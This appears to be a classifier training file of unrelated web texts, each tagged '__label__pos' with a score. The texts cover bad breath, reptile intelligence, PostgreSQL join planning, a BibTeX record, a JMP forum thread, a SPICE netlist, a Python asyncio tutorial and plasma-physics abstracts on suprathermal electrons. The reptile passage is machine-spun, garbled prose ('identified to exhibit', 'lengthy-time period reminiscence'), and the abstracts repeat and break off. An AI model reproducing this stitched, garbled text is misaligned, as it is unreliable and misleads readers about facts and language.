the bacterias prosper. It adds up to a smell too…  Are there any specific health issues that are connected to a bad breath? Such a thing as the periodontal disease may be an essential cause of the bad breath. So if smell and unpleasant taste in your mouth are a lasting issue, you’d better check with your dentist. Specifically on the matter of whether you have periodontal disease or not. Gum disease is caused by the appearance of plaque on teeth. Bacteria cause the formation of toxins to form, which irritate the gums and enamel. If such a gum disease carries on without any treatment to it provided, it can damage the gums and jawbone. Other dental causes of bad breath include poorly fitting dental appliances, yeast infections of the mouth, and denta The medical condition of the dry mouth (also called xerostomia) also can cause a bad smell. Saliva is necessary to moisten the mouth. It neutralizes acids produced by plaque and piles away the dead cells off the tongue, gums, and cheeks’ insides. If not removed, these cells begin to decay and can cause bad breath. Dry mouth may be a side effect of various medications. Also salivary gland problems or breathing with your mouth open can be an additional cause. Many other general diseases and illnesses may cause bad breath. Here are some to be aware of: respiratory tract infections such as pneumonia or bronchitis, chronic sinus infections, postnasal drip, diabetes, chronic acid reflux, and liver or kidney problems. Добавить комментарий
__label__pos
0.931669
applying Applying For A Reptile Licence Zoo Med Pure Aquatic Maintenance Method Turtle Meals, Forty Five reptile species Reptiles are generally thought of less clever than mammals and birds. Larger lizards, just like the screens, are identified to exhibit complex behavior, together with cooperation and cognitive talents permitting them to optimize their foraging and territoriality over time. Crocodiles have comparatively bigger brains and show a fairly complex social construction. The Komodo dragon is even identified to have interaction in play, as are turtles, which are also thought-about to be social creatures, and sometimes change between monogamy and promiscuity in their sexual behavior. One examine discovered that wood turtles have been higher than white rats at studying to navigate mazes. Another research discovered that big tortoises are able to learning by way of operant conditioning, visual discrimination and retained learned behaviors with lengthy-time period reminiscence. reptile species Birds Sea turtles have been regarded as having easy brains, however their flippers are used for a wide range of foraging duties in frequent with marine mammals. In all reptiles the urinogenital ducts and the anus both empty into an organ known as a cloaca. In some reptiles, a midventral wall within the cloaca might open into a urinary bladder, however not all. Forging Proactive Partnerships To Conserve Amphibians, Reptiles, And The Locations They Reside Most reptiles have copulatory organs, that are often retracted or inverted and stored contained in the body. In turtles and crocodilians, the male has a single median penis, whereas squamates, including snakes and lizards, possess a pair of hemipenes, … Read More
__label__pos
0.930734
Supported Versions: Current (12) / 11 / 10 / 9.6 / 9.5 Development Versions: 13 / devel Unsupported versions: 9.4 / 9.3 / 9.2 / 9.1 / 9.0 / 8.4 / 8.3 / 8.2 / 8.1 / 8.0 / 7.4 / 7.3 / 7.2 / 7.1 14.3. Controlling the Planner with Explicit JOIN Clauses It is possible to control the query planner to some extent by using the explicit JOIN syntax. To see why this matters, we first need some background. In a simple join query, such as: SELECT * FROM a, b, c WHERE a.id = b.id AND b.ref = c.id; the planner is free to join the given tables in any order. For example, it could generate a query plan that joins A to B, using the WHERE condition a.id = b.id, and then joins C to this joined table, using the other WHERE condition. Or it could join B to C and then join A to that result. Or it could join A to C and then join them with B — but that would be inefficient, since the full Cartesian product of A and C would have to be formed, there being no applicable condition in the WHERE clause to allow optimization of the join. (All joins in the PostgreSQL executor happen between two input tables, so it's necessary to build up the result in one or another of these fashions.) The important point is that these different join possibilities give semantically equivalent results but might have hugely different execution costs. Therefore, the planner will explore all of them to try to find the most efficient query plan. When a query only involves two or three tables, there aren't many join orders to worry about. But the number of possible join orders grows exponentially as the number of tables expands. Beyond ten or so input tables it's no longer practical to do an exhaustive search of all the possibilities, and even for six or seven tables planning might take an annoyingly long time. When there are too many input tables, the PostgreSQL planner will switch from exhaustive search to a genetic probabilistic search through a limited number of possibilities. (The switch-over threshold is set by the geqo_threshold run-time parameter.) The genetic search takes less time, but it won't necessarily find the best possible plan. When the query involves outer joins, the planner has less freedom than it does for plain (inner) joins. For example, consider: SELECT * FROM a LEFT JOIN (b JOIN c ON (b.ref = c.id)) ON (a.id = b.id); Although this query's restrictions are superficially similar to the previous example, the semantics are different because a row must be emitted for each row of A that has no matching row in the join of B and C. Therefore the planner has no choice of join order here: it must join B to C and then join A to that result. Accordingly, this query takes less time to plan than the previous query. In other cases, the planner might be able to determine that more than one join order is safe. For example, given: SELECT * FROM a LEFT JOIN b ON (a.bid = b.id) LEFT JOIN c ON (a.cid = c.id); it is valid to join A to either B or C first. Currently, only FULL JOIN completely constrains the join order. Most practical cases involving LEFT JOIN or RIGHT JOIN can be rearranged to some extent. Explicit inner join syntax (INNER JOIN, CROSS JOIN, or unadorned JOIN) is semantically the same as listing the input relations in FROM, so it does not constrain the join order. Even though most kinds of JOIN don't completely constrain the join order, it is possible to instruct the PostgreSQL query planner to treat all JOIN clauses as constraining the join order anyway. For example, these three queries are logically equivalent: SELECT * FROM a, b, c WHERE a.id = b.id AND b.ref = c.id; SELECT * FROM a CROSS JOIN b CROSS JOIN c WHERE a.id = b.id AND b.ref = c.id; SELECT * FROM a JOIN (b JOIN c ON (b.ref = c.id)) ON (a.id = b.id); But if we tell the planner to honor the JOIN order, the second and third take less time to plan than the first. This effect is not worth worrying about for only three tables, but it can be a lifesaver with many tables. To force the planner to follow the join order laid out by explicit JOINs, set the join_collapse_limit run-time parameter to 1. (Other possible values are discussed below.) You do not need to constrain the join order completely in order to cut search time, because it's OK to use JOIN operators within items of a plain FROM list. For example, consider: SELECT * FROM a CROSS JOIN b, c, d, e WHERE ...; With join_collapse_limit = 1, this forces the planner to join A to B before joining them to other tables, but doesn't constrain its choices otherwise. In this example, the number of possible join orders is reduced by a factor of 5. Constraining the planner's search in this way is a useful technique both for reducing planning time and for directing the planner to a good query plan. If the planner chooses a bad join order by default, you can force it to choose a better order via JOIN syntax — assuming that you know of a better order, that is. Experimentation is recommended. A closely related issue that affects planning time is collapsing of subqueries into their parent query. For example, consider: SELECT * FROM x, y, (SELECT * FROM a, b, c WHERE something) AS ss WHERE somethingelse; This situation might arise from use of a view that contains a join; the view's SELECT rule will be inserted in place of the view reference, yielding a query much like the above. Normally, the planner will try to collapse the subquery into the parent, yielding: SELECT * FROM x, y, a, b, c WHERE something AND somethingelse; This usually results in a better plan than planning the subquery separately. (For example, the outer WHERE conditions might be such that joining X to A first eliminates many rows of A, thus avoiding the need to form the full logical output of the subquery.) But at the same time, we have increased the planning time; here, we have a five-way join problem replacing two separate three-way join problems. Because of the exponential growth of the number of possibilities, this makes a big difference. The planner tries to avoid getting stuck in huge join search problems by not collapsing a subquery if more than from_collapse_limit FROM items would result in the parent query. You can trade off planning time against quality of plan by adjusting this run-time parameter up or down. from_collapse_limit and join_collapse_limit are similarly named because they do almost the same thing: one controls when the planner will flatten out subqueries, and the other controls when it will flatten out explicit joins. Typically you would either set join_collapse_limit equal to from_collapse_limit (so that explicit joins and subqueries act similarly) or set join_collapse_limit to 1 (if you want to control join order with explicit joins). But you might set them differently if you are trying to fine-tune the trade-off between planning time and run time. Submit correction If you see anything in the documentation that is not correct, does not match your experience with the particular feature or requires further clarification, please use this form to report a documentation issue.
__label__pos
0.97008
# This BibTeX File has been generated by # the Typo3 extension 'Sixpack-4-T3 by Sixten Boeck' # (customized by Stephan Lange) # # URL: # Date: 03/01/2024 @InBook{GALKW2016, author = {Ganesan, R. S. and Al-Shatri, H. and Li, X. and Klein, A. and Weber, T.}, title = {{Interference alignment aided by non-regenerative relays}}, year = 2016, pages = {327--345}, editor = {Utschick, W.}, publisher = {Springer}, address = {Cham}, chapter = {14}, booktitle = {Communications in Interference Limited Networks} }
__label__pos
0.997047
Choose Language Hide Translation Bar Highlighted bswedlove Level III Open(url) is pulling cached data, how to refresh? When i run the following code I get the data, but when I run this again the data is not refreshed.  dt=open(url,JSON) It seems to pull the data from some stored cache.  How can I pull the new data with a script?   I am currently getting around this by closing JMP and then opening JMP again and running the code and I get the new refreshed data. 1 ACCEPTED SOLUTION Accepted Solutions Highlighted txnelson Super User Re: Open(url) is pulling cached data, how to refresh? I Scanned the Discussion Forum and found an entry called "Loading file from URL, how to refresh?" It has the following solution "OK, so I found the solution for this: I opened internet explorer and went to settings>general> browsing history>settings> check for newer versions of stored page and selected "every time I visit the webpage" ("automatically" was selected previously). Now I get the new file every time I load the url. Hope this will help someone who has a similar problem in the future."   Jim View solution in original post 3 REPLIES 3 Highlighted txnelson Super User Re: Open(url) is pulling cached data, how to refresh? I Scanned the Discussion Forum and found an entry called "Loading file from URL, how to refresh?" It has the following solution "OK, so I found the solution for this: I opened internet explorer and went to settings>general> browsing history>settings> check for newer versions of stored page and selected "every time I visit the webpage" ("automatically" was selected previously). Now I get the new file every time I load the url. Hope this will help someone who has a similar problem in the future."   Jim View solution in original post Highlighted Re: Open(url) is pulling cached data, how to refresh? A more generic approach that doesn't rely on changing the configuration of your browser (and so won't affect regular browsing which does benefit from caching) is to append to the URL a unique identifier, thus defeating the caching mechanism.   Since you are in JSL, you can use a small function to wrap your urls before calling open() on them. For example:   make_unique = Function({url}, {Default Local}, sep = If(Contains(url, "?"), "&", "?"); new_url = url || sep || Char(Abs(Random Normal())) ); // test make_unique("http://google.com"); /*: "http://google.com?0.133842366607301" //:*/ make_unique("https://www.google.com/search?q=url") /*: "https://www.google.com/search?q=url&0.249786194571203" //:*/ With that function defined, your calls would become dt=open(make_unique(url),JSON)     Highlighted bswedlove Level III Re: Open(url) is pulling cached data, how to refresh? This also works well but, since I don't use Internet Explorer, stopping caching here does not affect me. Also I am afraid that this could cause weird problems if an API is expecting a certain number of arguments. Article Labels There are no labels assigned to this post.
__label__pos
0.986257
blob: 8bdbc6b8aa7f839eab5366526150df34560dd918 [file] [log] [blame] * Copyright 2020 The SkyWater PDK Authors * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * * SPDX-License-Identifier: Apache-2.0 .SUBCKT sky130_fd_sc_ms__buf_16 A VGND VNB VPB VPWR X *.PININFO A:I VGND:I VNB:I VPB:I VPWR:I X:O MMIN1 Ab A VNB nlowvt m=6 w=0.74 l=0.15 mult=1 sa=0.265 sb=0.265 + sd=0.28 topography=normal area=0.063 perim=1.14 MMIN2 X Ab VNB nlowvt m=16 w=0.74 l=0.15 mult=1 sa=0.265 sb=0.265 + sd=0.28 topography=normal area=0.063 perim=1.14 MMIP1 Ab A VPB pshort m=6 w=1.12 l=0.18 mult=1 sa=0.265 sb=0.265 + sd=0.28 topography=normal area=0.063 perim=1.14 MMIP2 X Ab VPB pshort m=16 w=1.12 l=0.18 mult=1 sa=0.265 sb=0.265 + sd=0.28 topography=normal area=0.063 perim=1.14 .ENDS sky130_fd_sc_ms__buf_16
__label__pos
0.926993
Home Map asyncio ExampleUse the asyncio module to run coroutines in parallel. Review ensure_future and yield from asyncio.sleep. Python This page was last reviewed on Sep 29, 2022. Asyncio. Often methods need to run, but we do not need to wait for them. They are not blocking methods. We can run them in the background. With asyncio, a module in Python 3.5, we can use an event loop to run asynchronous methods. With "yield from" we can run methods in parallel. An example. This program introduces a simple "logic" method that computes a number. After each iteration it uses the "yield from" syntax to call asyncio.sleep. Detail We use get_event_loop to begin adding methods to run. We create a tasks list with ensure_future calls. Detail We call run_until_complete with the result of gather() to execute all our methods in parallel. Detail The methods would not yield to each other without the "yield from asyncio.sleep" statement. import asyncio @asyncio.coroutine def logic(max): # This method runs some logic in a loop. # ... The max is specified as an argument. count = 0 for i in range(1, max): count += i count = count / i # Provide a chance to run other methods. yield from asyncio.sleep(1) # Finished. print("Logic result", max, count) # Get our event loop. loop = asyncio.get_event_loop() # Call logic method four times. tasks = [ asyncio.ensure_future(logic(5)), asyncio.ensure_future(logic(20)), asyncio.ensure_future(logic(10)), asyncio.ensure_future(logic(1))] # Run until all logic methods have completed. # ... The sleep call will allow all to run in parallel. loop.run_until_complete(asyncio.gather(*tasks)) loop.close() Logic result 1 0 Logic result 5 1.375 Logic result 10 1.1274057539682538 Logic result 20 1.0557390762436003 Yield. Having a call to a "yield from" method is critical to having parallel method execution in Python. Sleep() simply does nothing—it pauses the current thread. But Having asleep call gives other methods a chance to run. The other methods run when asyncio.sleep is called. Some notes. In a real program, the asyncio.sleep method is still useful. In a long-running method, we can call asyncio.sleep periodically to allow other things to happen. Some notes, continued. With the basic pattern in this program, we can run tasks in parallel in Python. We can load data from files, compute values in memory, or do anything. Official documentation. With the asyncio module introduced in Python 3.5, we can access many built-in asyncio methods. For complete coverage, please use the Python documentation. A review. Async programming is a key development in Python 3.5. This feature enables more complex programs to execute—without blocking. So the program remains responsive. C#VB.NETPythonGolangJavaSwiftRust Dot Net Perls is a collection of tested code examples. Pages are continually updated to stay current, with code correctness a top priority. Sam Allen is passionate about computer languages. In the past, his work has been recommended by Apple and Microsoft and he has studied computers at a selective university in the United States. This page was last updated on Sep 29, 2022 (grammar). Home Changes © 2007-2023 Sam Allen.
__label__pos
0.857402
WorldWideScience Sample records for suprathermal electron measurements 1. Measurement of suprathermal electron confinement by cyclotron transmission International Nuclear Information System (INIS) Kirkwood, R.; Hutchinson, I.H.; Luckhardt, S.C.; Porkolab, M.; Squire, J.P. 1990-01-01 The confinement time of suprathermal electrons is determined experimentally from the distribution function determined via wave transmission measurements. Measurements of the lowest moment of the distribution perpendicular to the B field as a function of the parallel electron momentum as well as the global input power allow the suprathermal electron confinement time (τ se ) to be calculated during lower-hybrid and inductive current drive. Finite particle confinement is found to be the dominant energy loss term for the suprathermals and improves with plasma current and density 2. A system to measure suprathermal electron distribution functions in toroidal plasmas by electron cyclotron wave absorption International Nuclear Information System (INIS) Boyd, D.A.; Skiff, F.; Gulick, S. 1997-01-01 A two-chord, four-beam suprathermal electron diagnostic has been installed on TdeV (B>1.5 T, R=0.86 m, a=0.25 m). Resonant absorption of extraordinary mode electron cyclotron waves is measured to deduce the chordal averaged suprathermal electron distribution function amplitude at the resonant momentum. Simultaneously counterpropagating beams permit good refractive loss cancellation. A nonlinear frequency sweep leads to a concentration of appropriately propagating power in a narrow range of time of flight, thus increasing the signal-to-noise ratio and facilitating the rejection of spurious reflections. Numerous measurements of electron distribution functions have been obtained during lower-hybrid current-drive experiments. copyright 1997 American Institute of Physics 3. A method to measure the suprathermal density distribution by electron cyclotron emission International Nuclear Information System (INIS) Tutter, M. 1986-05-01 Electron cyclotron emission spectra of suprathermal electrons in a thermal main plasma are calculated. It is shown that for direction of observation oblique to the magnetic field, which decays in direction to the receiver, one may obtain information on the spatial density distribution of the suprathermal electrons from those spectra. (orig.) 4. Suprathermal electron studies in Tokamak plasmas by means of diagnostic measurements and modeling International Nuclear Information System (INIS) Kamleitner, J. 2015-01-01 To achieve reactor-relevant conditions in a tokamak plasma, auxiliary heating systems are required and can be realized by waves injected in the plasma that heat ions or electrons. Electron cyclotron resonant heating (ECRH) is a very flexible and robust technique featuring localized power deposition and current drive (CD) capabilities. Its fundamental principles are well understood and the application of ECRH is a proven and established tool; electron cyclotron current drive (ECCD) is regularly used to develop advanced scenarios and control magneto-hydrodynamics (MHD) instabilities in the plasma by tailoring the current profile. There remain important open questions, such as the phase space dynamics, the observed radial broadening of the supra-thermal electron distribution function and discrepancies in predicted and experimental CD efficiency. A main goal is to improve the understanding of wave-particle interaction in plasmas and current drive mechanisms. This was accomplished by combined experimental and numerical studies, strongly based on the conjunction of hard X-ray (HXR) Bremsstrahlung measurements and Fokker-Planck modelling, characterizing the supra-thermal electron population. The hard X-ray tomographic spectrometer (HXRS) diagnostic was developed to perform these studies by investigating spatial HXR emission asymmetries in the co- and counter-current directions and within the poloidal plane. The system uses cadmium-telluride detectors and digital acquisition to store the complete time history of incoming photon pulses. An extensive study of digital pulse processing algorithms was performed and its application allows the HXRS to handle high count rates in a noisy tokamak environment. Numerical tools were developed to improve the time resolution by conditional averaging and to obtain local information with the general tomographic inversion package. The interfaces of the LUKE code and the well-established CQL3D Fokker-Planck code to the Tokamak a 5. Measurement and modelling of suprathermal electron bursts generated in front of a lower hybrid antenna Czech Academy of Sciences Publication Activity Database Gunn, J. P.; Fuchs, Vladimír; Petržílka, Václav; Ekedahl, A.; Fedorczak, N.; Goniche, M.; Hillairet, J. 2016-01-01 Roč. 56, č. 3 (2016), č. článku 036004. ISSN 0029-5515 R&D Projects: GA MŠk(CZ) LM2011021 Institutional support: RVO:61389021 Keywords : lower hybrid * scrape off layer * SOL turbulence * Landau damping * suprathermal electrons Subject RIV: BL - Plasma and Gas Discharge Physics OBOR OECD: Fluids and plasma physics (including surface physics) Impact factor: 3.307, year: 2016 http://iopscience.iop.org/article/10.1088/0029-5515/56/3/036004 6. Finite grid radius and thickness effects on retarding potential analyzer measured suprathermal electron density and temperature International Nuclear Information System (INIS) Knudsen, W.C. 1992-01-01 The effect of finite grid radius and thickness on the electron current measured by planar retarding potential analyzers (RPAs) is analyzed numerically. Depending on the plasma environment, the current is significantly reduced below that which is calculated using a theoretical equation derived for an idealized RPA having grids with infinite radius and vanishingly small thickness. A correction factor to the idealized theoretical equation is derived for the Pioneer Venus (PV) orbiter RPA (ORPA) for electron gases consisting of one or more components obeying Maxwell statistics. The error in density and temperature of Maxwellian electron distributions previously derived from ORPA data using the theoretical expression for the idealized ORPA is evaluated by comparing the densities and temperatures derived from a sample of PV ORPA data using the theoretical expression with and without the correction factor 7. SUPRATHERMAL ELECTRONS AT SATURN'S BOW SHOCK Energy Technology Data Exchange (ETDEWEB) Masters, A.; Dougherty, M. K. [The Blackett Laboratory, Imperial College London, Prince Consort Road, London, SW7 2AZ (United Kingdom); Sulaiman, A. H. [Department of Physics and Astronomy, University of Iowa, Iowa City, IA 52242 (United States); Sergis, N. [Office of Space Research and Technology, Academy of Athens, Soranou Efesiou 4, 11527 Athens (Greece); Stawarz, L. [Astronomical Observatory, Jagiellonian University, ul. Orla 171, 30-244 Krakow (Poland); Fujimoto, M. [Institute of Space and Astronautical Science, Japan Aerospace Exploration Agency, 3-1-1 Yoshinodai, Chuo-ku, Sagamihara, Kanagawa 252-5210 (Japan); Coates, A. J., E-mail: [email protected] [Mullard Space Science Laboratory, Department of Space and Climate Physics, University College London, Holmbury St. Mary, Dorking RH5 6NT (United Kingdom) 2016-07-20 The leading explanation for the origin of galactic cosmic rays is particle acceleration at the shocks surrounding young supernova remnants (SNRs), although crucial aspects of the acceleration process are unclear. The similar collisionless plasma shocks frequently encountered by spacecraft in the solar wind are generally far weaker (lower Mach number) than these SNR shocks. However, the Cassini spacecraft has shown that the shock standing in the solar wind sunward of Saturn (Saturn's bow shock) can occasionally reach this high-Mach number astrophysical regime. In this regime Cassini has provided the first in situ evidence for electron acceleration under quasi-parallel upstream magnetic conditions. Here we present the full picture of suprathermal electrons at Saturn's bow shock revealed by Cassini . The downstream thermal electron distribution is resolved in all data taken by the low-energy electron detector (CAPS-ELS, <28 keV) during shock crossings, but the higher energy channels were at (or close to) background. The high-energy electron detector (MIMI-LEMMS, >18 keV) measured a suprathermal electron signature at 31 of 508 crossings, where typically only the lowest energy channels (<100 keV) were above background. We show that these results are consistent with the theory in which the “injection” of thermal electrons into an acceleration process involves interaction with whistler waves at the shock front, and becomes possible for all upstream magnetic field orientations at high Mach numbers like those of the strong shocks around young SNRs. A future dedicated study will analyze the rare crossings with evidence for relativistic electrons (up to ∼1 MeV). 8. SUPRATHERMAL ELECTRONS AT SATURN'S BOW SHOCK International Nuclear Information System (INIS) Masters, A.; Dougherty, M. K.; Sulaiman, A. H.; Sergis, N.; Stawarz, L.; Fujimoto, M.; Coates, A. J. 2016-01-01 The leading explanation for the origin of galactic cosmic rays is particle acceleration at the shocks surrounding young supernova remnants (SNRs), although crucial aspects of the acceleration process are unclear. The similar collisionless plasma shocks frequently encountered by spacecraft in the solar wind are generally far weaker (lower Mach number) than these SNR shocks. However, the Cassini spacecraft has shown that the shock standing in the solar wind sunward of Saturn (Saturn's bow shock) can occasionally reach this high-Mach number astrophysical regime. In this regime Cassini has provided the first in situ evidence for electron acceleration under quasi-parallel upstream magnetic conditions. Here we present the full picture of suprathermal electrons at Saturn's bow shock revealed by Cassini . The downstream thermal electron distribution is resolved in all data taken by the low-energy electron detector (CAPS-ELS, <28 keV) during shock crossings, but the higher energy channels were at (or close to) background. The high-energy electron detector (MIMI-LEMMS, >18 keV) measured a suprathermal electron signature at 31 of 508 crossings, where typically only the lowest energy channels (<100 keV) were above background. We show that these results are consistent with the theory in which the “injection” of thermal electrons into an acceleration process involves interaction with whistler waves at the shock front, and becomes possible for all upstream magnetic field orientations at high Mach numbers like those of the strong shocks around young SNRs. A future dedicated study will analyze the rare crossings with evidence for relativistic electrons (up to ∼1 MeV). 9. Suprathermal electron studies in the TCV tokamak: Design of a tomographic hard-x-ray spectrometer International Nuclear Information System (INIS) Gnesin, S.; Coda, S.; Decker, J.; Peysson, Y. 2008-01-01 Electron cyclotron resonance heating and electron cyclotron current drive, disruptive events, and sawtooth activity are all known to produce suprathermal electrons in fusion devices, motivating increasingly detailed studies of the generation and dynamics of this suprathermal population. Measurements have been performed in the past years in the tokamak a configuration variable (TCV) tokamak using a single pinhole hard-x-ray (HXR) camera and electron-cyclotron-emission radiometers, leading, in particular, to the identification of the crucial role of spatial transport in the physics of ECCD. The observation of a poloidal asymmetry in the emitted suprathermal bremsstrahlung radiation motivates the design of a proposed new tomographic HXR spectrometer reported in this paper. The design, which is based on a compact modified Soller collimator concept, is being aided by simulations of tomographic reconstruction. Quantitative criteria have been developed to optimize the design for the greatly variable shapes and positions of TCV plasmas. 10. PIC simulation of the electron-ion collision effects on suprathermal electrons International Nuclear Information System (INIS) Wu Yanqing; Han Shensheng 2000-01-01 The generation and transportation of suprathermal electrons are important to both traditional ICF scheme and 'Fast Ignition' scheme. The author discusses the effects of electron-ion collision on the generation and transportation of the suprathermal electrons by parametric instability. It indicates that the weak electron-ion term in the PIC simulation results in the enhancement of the collisional absorption and increase of the hot electron temperature and reduction in the maximum electrostatic field amplitude while wave breaking. Therefore the energy and distribution of the suprathermal electrons are changed. They are distributed more close to the phase velocity of the electrostatic wave than the case without electron-ion collision term. The electron-ion collision enhances the self-consistent field and impedes the suprathermal electron transportation. These factors also reduce the suprathermal electron energy. In addition, the authors discuss the effect of initial condition on PIC simulation to ensure that the results are correct 11. Effect of suprathermal electrons on the impurity ionization state International Nuclear Information System (INIS) Ochando, M A; Medina, F; Zurro, B; McCarthy, K J; Pedrosa, M A; Baciero, A; Rapisarda, D; Carmona, J M; Jimenez, D 2006-01-01 The effect of electron cyclotron resonance heating induced suprathermal electron tails on the ionization of iron impurities in magnetically confined plasmas is investigated. The behaviour of plasma emissivity immediately after injection provides evidence of a spatially localized 'shift' towards higher charge states of the impurity. Bearing in mind that the non-inductive plasma heating methods generate long lasting non-Maxwellian distribution functions, possible implications on the deduced impurity transport coefficients, when fast electrons are present, are discussed 12. Generation of Suprathermal Electrons by Collective Processes in Collisional Plasma Science.gov (United States) Tigik, S. F.; Ziebell, L. F.; Yoon, P. H. 2017-11-01 The ubiquity of high-energy tails in the charged particle velocity distribution functions (VDFs) observed in space plasmas suggests the existence of an underlying process responsible for taking a fraction of the charged particle population out of thermal equilibrium and redistributing it to suprathermal velocity and energy ranges. The present Letter focuses on a new and fundamental physical explanation for the origin of suprathermal electron velocity distribution function (EVDF) in a collisional plasma. This process involves a newly discovered electrostatic bremsstrahlung (EB) emission that is effective in a plasma in which binary collisions are present. The steady-state EVDF dictated by such a process corresponds to a Maxwellian core plus a quasi-inverse power-law tail, which is a feature commonly observed in many space plasma environments. In order to demonstrate this, the system of self-consistent particle- and wave-kinetic equations are numerically solved with an initially Maxwellian EVDF and Langmuir wave spectral intensity, which is a state that does not reflect the presence of EB process, and hence not in force balance. The EB term subsequently drives the system to a new force-balanced steady state. After a long integration period it is demonstrated that the initial Langmuir fluctuation spectrum is modified, which in turn distorts the initial Maxwellian EVDF into a VDF that resembles the said core-suprathermal VDF. Such a mechanism may thus be operative at the coronal source region, which is characterized by high collisionality. 13. Development and performance of a suprathermal electron spectrometer to study auroral precipitations Energy Technology Data Exchange (ETDEWEB) Ogasawara, Keiichi, E-mail: [email protected]; Stange, Jason L.; Trevino, John A.; Webster, James [Southwest Research Institute, 6220 Culebra Road, San Antonio, Texas 78238 (United States); Grubbs, Guy [University of Texas at San Antonio, One UTSA circle, San Antonio, Texas 78249 (United States); Goddard Space Flight Center, National Aeronautics and Space Administration, 8800 Greenbelt Rd, Greenbelt, Maryland 20771 (United States); Michell, Robert G.; Samara, Marilia [Goddard Space Flight Center, National Aeronautics and Space Administration, 8800 Greenbelt Rd, Greenbelt, Maryland 20771 (United States); Jahn, Jörg-Micha [Southwest Research Institute, 6220 Culebra Road, San Antonio, Texas 78238 (United States); University of Texas at San Antonio, One UTSA circle, San Antonio, Texas 78249 (United States) 2016-05-15 The design, development, and performance of Medium-energy Electron SPectrometer (MESP), dedicated to the in situ observation of suprathermal electrons in the auroral ionosphere, are summarized in this paper. MESP employs a permanent magnet filter with a light tight structure to select electrons with proper energies guided to the detectors. A combination of two avalanche photodiodes and a large area solid-state detector (SSD) provided 46 total energy bins (1 keV resolution for 3−20 keV range for APDs, and 7 keV resolution for >20 keV range for SSDs). Multi-channel ultra-low power application-specific integrated circuits are also verified for the flight operation to read-out and analyze the detector signals. MESP was launched from Poker Flat Research Range on 3 March 2014 as a part of ground-to-rocket electrodynamics-electrons correlative experiment (GREECE) mission. MESP successfully measured the precipitating electrons from 3 to 120 keV in 120-ms time resolution and characterized the features of suprathermal distributions associated with auroral arcs throughout the flight. The measured electrons were showing the inverted-V type spectra, consistent with the past measurements. In addition, investigations of the suprathermal electron population indicated the existence of the energetic non-thermal distribution corresponding to the brightest aurora. 14. Development and performance of a suprathermal electron spectrometer to study auroral precipitations International Nuclear Information System (INIS) Ogasawara, Keiichi; Stange, Jason L.; Trevino, John A.; Webster, James; Grubbs, Guy; Michell, Robert G.; Samara, Marilia; Jahn, Jörg-Micha 2016-01-01 The design, development, and performance of Medium-energy Electron SPectrometer (MESP), dedicated to the in situ observation of suprathermal electrons in the auroral ionosphere, are summarized in this paper. MESP employs a permanent magnet filter with a light tight structure to select electrons with proper energies guided to the detectors. A combination of two avalanche photodiodes and a large area solid-state detector (SSD) provided 46 total energy bins (1 keV resolution for 3−20 keV range for APDs, and 7 keV resolution for >20 keV range for SSDs). Multi-channel ultra-low power application-specific integrated circuits are also verified for the flight operation to read-out and analyze the detector signals. MESP was launched from Poker Flat Research Range on 3 March 2014 as a part of ground-to-rocket electrodynamics-electrons correlative experiment (GREECE) mission. MESP successfully measured the precipitating electrons from 3 to 120 keV in 120-ms time resolution and characterized the features of suprathermal distributions associated with auroral arcs throughout the flight. The measured electrons were showing the inverted-V type spectra, consistent with the past measurements. In addition, investigations of the suprathermal electron population indicated the existence of the energetic non-thermal distribution corresponding to the brightest aurora. 15. Electron heat conduction and suprathermal particles International Nuclear Information System (INIS) Bakunin, O.G.; Krasheninnikov, S.I. 1991-01-01 As recognized at present, the applicability of Spitzer-Harm's theory on electron heat conduction along the magnetic field is limited by comparatively small values of the thermal electron mean free path ratio, λ to the characteristic length of changes in plasma parameters, L: γ=λ/L≤10 -2 . The stationary kinetic equation for the electron distribution function inhomogeneous along the x-axis f e (v,x) allows one to have solutions in the self-similar variables. The objective of a given study is to generalize the solutions for the case of arbitrary Z eff , that will allow one to compare approximate solutions to the kinetic equation with the precise ones in a wide range of parameters. (author) 8 refs., 2 figs 16. Effect of suprathermal electrons on the intensity and Doppler frequency of electron plasma lines Directory of Open Access Journals (Sweden) P. Guio Full Text Available In an incoherent scattering radar experiment, the spectral measurement of the so-called up- and downshifted electron plasma lines provides information about their intensity and their Doppler frequency. These two spectral lines correspond, in the backscatter geometry, to two Langmuir waves travelling towards and away from the radar. In the daytime ionosphere, the presence of a small percentage of photoelectrons produced by the solar EUV of the total electron population can excite or damp these Langmuir waves above the thermal equilibrium, resulting in an enhancement of the intensity of the lines above the thermal level. The presence of photo-electrons also modifies the dielectric response function of the plasma from the Maxwellian and thus influences the Doppler frequency of the plasma lines. In this paper, we present a high time-resolution plasma-line data set collected on the Eiscat VHF radar. The analysed data are compared with a model that includes the effect of a suprathermal electron population calculated by a transport code. By comparing the intensity of the analysed plasma lines data to our model, we show that two sharp peaks in the electron suprathermal distribution in the energy range 20-30 eV causes an increased Landau damping around 24.25 eV and 26.25 eV. We have identified these two sharp peaks as the effect of the photoionisation of N2 and O by the intense flux of monochromatic HeII radiation of wavelength 30.378 nm (40.812 eV created in the chromospheric network and coronal holes. Furthermore, we see that what would have been interpreted as a mean Doppler drift velocity for a Maxwellian plasma is actually a shift of the Doppler frequency of the plasma lines due to suprathermal electrons. Key words. Ionosphere (electric fields and currents; solar radiation and cosmic ray effects 17. Effect of suprathermal electrons on the intensity and Doppler frequency of electron plasma lines Directory of Open Access Journals (Sweden) P. Guio 1999-07-01 Full Text Available In an incoherent scattering radar experiment, the spectral measurement of the so-called up- and downshifted electron plasma lines provides information about their intensity and their Doppler frequency. These two spectral lines correspond, in the backscatter geometry, to two Langmuir waves travelling towards and away from the radar. In the daytime ionosphere, the presence of a small percentage of photoelectrons produced by the solar EUV of the total electron population can excite or damp these Langmuir waves above the thermal equilibrium, resulting in an enhancement of the intensity of the lines above the thermal level. The presence of photo-electrons also modifies the dielectric response function of the plasma from the Maxwellian and thus influences the Doppler frequency of the plasma lines. In this paper, we present a high time-resolution plasma-line data set collected on the Eiscat VHF radar. The analysed data are compared with a model that includes the effect of a suprathermal electron population calculated by a transport code. By comparing the intensity of the analysed plasma lines data to our model, we show that two sharp peaks in the electron suprathermal distribution in the energy range 20-30 eV causes an increased Landau damping around 24.25 eV and 26.25 eV. We have identified these two sharp peaks as the effect of the photoionisation of N2 and O by the intense flux of monochromatic HeII radiation of wavelength 30.378 nm (40.812 eV created in the chromospheric network 